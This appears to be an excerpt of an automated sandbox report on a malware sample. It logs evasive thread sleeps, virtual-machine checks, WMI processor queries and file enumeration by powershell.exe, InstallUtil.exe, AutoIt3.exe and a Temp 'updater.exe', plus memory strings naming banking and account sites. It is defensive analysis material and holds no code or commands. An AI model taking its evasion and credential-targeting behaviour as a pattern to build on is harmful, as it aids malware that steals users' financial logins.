Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1782	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1612	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1142	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 351	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4787	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4971	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 4423	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 5174	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	API coverage: 5.7 %
Source: C:\ahdccea\AutoIt3.exe	API coverage: 5.6 %

Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892	Thread sleep count: 1782 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892	Thread sleep count: 1612 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3560	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692	Thread sleep count: 1142 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5036	Thread sleep count: 351 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4124	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5356	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -53914s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -59874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -59765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -57095s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -48518s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -59655s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -59546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -31082s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -59437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -59327s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -33223s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -55549s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -59218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -59109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -40624s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -58999s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -58882s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -30828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -47207s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664	Thread sleep time: -58781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -35191s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -48010s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -44265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -51889s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -34703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -32287s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -31902s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -36950s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -52285s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -48178s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -50028s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -52309s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5864	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -57961s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -36117s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -43446s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -50848s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -48112s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -49302s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5232	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -52005s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5484	Thread sleep time: -43571s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1548	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004C4005
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_004CC2FF
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004C494A GetFileAttributesW,FindFirstFileW,FindClose,	11_2_004C494A
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CCD14 FindFirstFileW,FindClose,	11_2_004CCD14
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	11_2_004CCD9F
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004CF5D8
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004CF735
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_004CFA36
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004C3CE2
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0133203D FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	11_2_0133203D
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_01332145 FindFirstFileA,GetLastError,	11_2_01332145
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0132F96D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	11_2_0132F96D
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_009E4005
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	14_2_009EC2FF
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009E494A GetFileAttributesW,FindFirstFileW,FindClose,	14_2_009E494A
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	14_2_009ECD9F
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009ECD14 FindFirstFileW,FindClose,	14_2_009ECD14
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_009EF5D8
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_009EF735
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	14_2_009EFA36
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_009E3CE2
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_017568AD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	14_2_017568AD
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_017541DD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	14_2_017541DD
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_017569B5 FindFirstFileA,GetLastError,	14_2_017569B5

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_00475D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00475D13

Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 53914	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 57095	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 48518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31082	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33223	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 55549	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 40624	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 58999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 58882	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 47207	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 58781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35191	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 48010	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 44265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 51889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32287	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31902	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36950	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 52285	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 48178	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 50028	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 52309	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 57961	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36117	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 43446	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 50848	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 48112	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 49302	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 52005	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 43571	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: updater.exe, updater.exe, 0000000B.00000002.2233117530.0000000003AA6000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2232683443.0000000001328000.00000040.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2226130630.0000000001354000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2227146321.0000000001385000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2226395944.0000000001382000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2226395944.0000000001329000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2227013081.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2227434795.000000000135A000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2225743067.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2227434795.000000000137E000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe	Binary or memory string: microsoft hyper-v video
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: mshta.exe, 00000005.00000003.2306322937.000001965B638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307115085.000001965B638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293225799.000001965B638000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3768615350.0000019B58E54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: mshta.exe, 00000005.00000002.2306996383.000001965B5E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2294457547.000001965B5E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306370988.000001965B5E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWdClass
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
